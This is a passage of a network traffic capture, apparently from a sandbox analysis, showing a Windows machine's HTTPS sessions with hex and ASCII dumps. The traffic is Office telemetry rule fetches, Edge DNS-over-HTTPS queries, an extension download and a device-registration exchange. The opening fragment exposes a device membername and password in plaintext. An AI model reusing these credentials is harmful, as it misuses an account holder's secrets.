version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02vqtxeehyersqcr</Membername><Password>vsR@qS+q@+^5Y`P)ydzo</Password></Authentication><OldMembername>02qtltntcbrequaj</OldM
2024-11-02 16:56:49 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Sat, 02 Nov 2024 16:55:46 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C526_SN1 x-ms-request-id: 65bc5baf-7b11-4551-afc1-8b315f8b6918 PPServer: PPV: 30 H: SN1PEPF0002F9C0 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 02 Nov 2024 16:56:48 GMT Connection: close Content-Length: 17166
2024-11-02 16:56:49 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 34 30 31 30 34 45 30 34 30 46 30 46 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 35 32 38 65 31 39 32 39 2d 33 36 65 36 2d 34 35 62 62 2d 61 32 35 63 2d 35 37 65 65 61 38 38 33 35 34 65 30 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>001840104E040F0F</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="528e1929-36e6-45bb-a25c-57eea88354e0" LicenseID="3252b20c-d425-4711
2024-11-02 16:56:49 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.7	49873	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:47 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:47 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 8b140993-f01e-005d-3914-2c13ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165647Z-176bd8f9bc5zzwfdhC1DFWqpb400000002f0000000001hr5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:47 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.7	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:47 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:47 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165647Z-15869dbbcc68l9dbhC1DFW29n000000000xg000000006n2d x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:47 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.7	49881	172.64.41.3	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-02 16:56:47 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
2024-11-02 16:56:47 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 02 Nov 2024 16:56:47 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dc5a8f1dbf26b17-DFW alt-svc: h3=":443"; ma=86400
2024-11-02 16:56:47 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 01 fb 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 73 00 27 0e 70 72 6f 64 2d 61 67 69 63 2d 77 75 2d 33 06 77 65 73 74 75 73 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 82 00 06 00 01 00 00 00 3c 00 30 06 6e 73 31 2d 30 32 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 f3 00 0c 00 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: data-edgesmartscreenmicrosoftcomA&prod-atm-wds-edgetrafficmanagernetAs'prod-agic-wu-3westuscloudappazure,<0ns1-02azure-dns,msnhst"',:<)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.7	49882	172.64.41.3	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-02 16:56:47 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-02 16:56:47 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 02 Nov 2024 16:56:47 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dc5a8f1ef46a927-DFW alt-svc: h3=":443"; ma=86400
2024-11-02 16:56:47 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 17 00 04 8e fa 72 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomr^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.7	49880	162.159.61.3	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-02 16:56:47 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.7	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:47 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:47 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165647Z-15869dbbcc6rmhmhhC1DFWd7b800000000q0000000006r1b x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:47 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.7	49875	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:47 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:47 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: a08d360f-701e-0053-4812-2c3a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165647Z-176bd8f9bc5fngbjhC1DFWmqsc00000001zg00000000b74k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:47 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.7	49876	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:47 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:47 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:47 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 3018dd1c-101e-008d-1bd2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165647Z-15869dbbcc6m5ms4hC1DFWx02800000000xg0000000073d9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:47 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.7	49885	152.195.19.97	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	612	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731171403&P2=404&P3=2&P4=GSqvpCJ6nyZIvRoPOucMpRj4yZHs18PS5QD9XKp0r2PQ1vc5xYVhil3MI3GztMQwS4eVrtnrtwogcvq2mwZ8fg%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: cdxjLKxgZ065tepGFX07+U Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-02 16:56:48 UTC	633	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 10493139 Cache-Control: public, max-age=17280000 Content-Type: application/x-chrome-extension Date: Sat, 02 Nov 2024 16:56:48 GMT Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT MS-CorrelationId: 5880bbaa-f139-48dd-942e-a0adb04a9f4c MS-CV: Grb0Lx3ldaAxoNaTt1rCGY.0 MS-RequestId: 803a6f2d-d0c7-4dfc-9472-668c4d649ec3 Server: ECAcc (dac/9C9C) X-AspNet-Version: 4.0.30319 X-AspNetMvc-Version: 5.3 X-Cache: HIT X-CCC: US X-CID: 11 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Connection: close
2024-11-02 16:56:48 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.7	49886	13.107.246.57	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-02 16:56:48 UTC	577	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: feee3f59-001e-004e-5e72-2cade2000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241102T165648Z-r159446fcd7b9q82hC1DFWp8rw00000001ug000000004mx8 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:48 UTC	15807	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
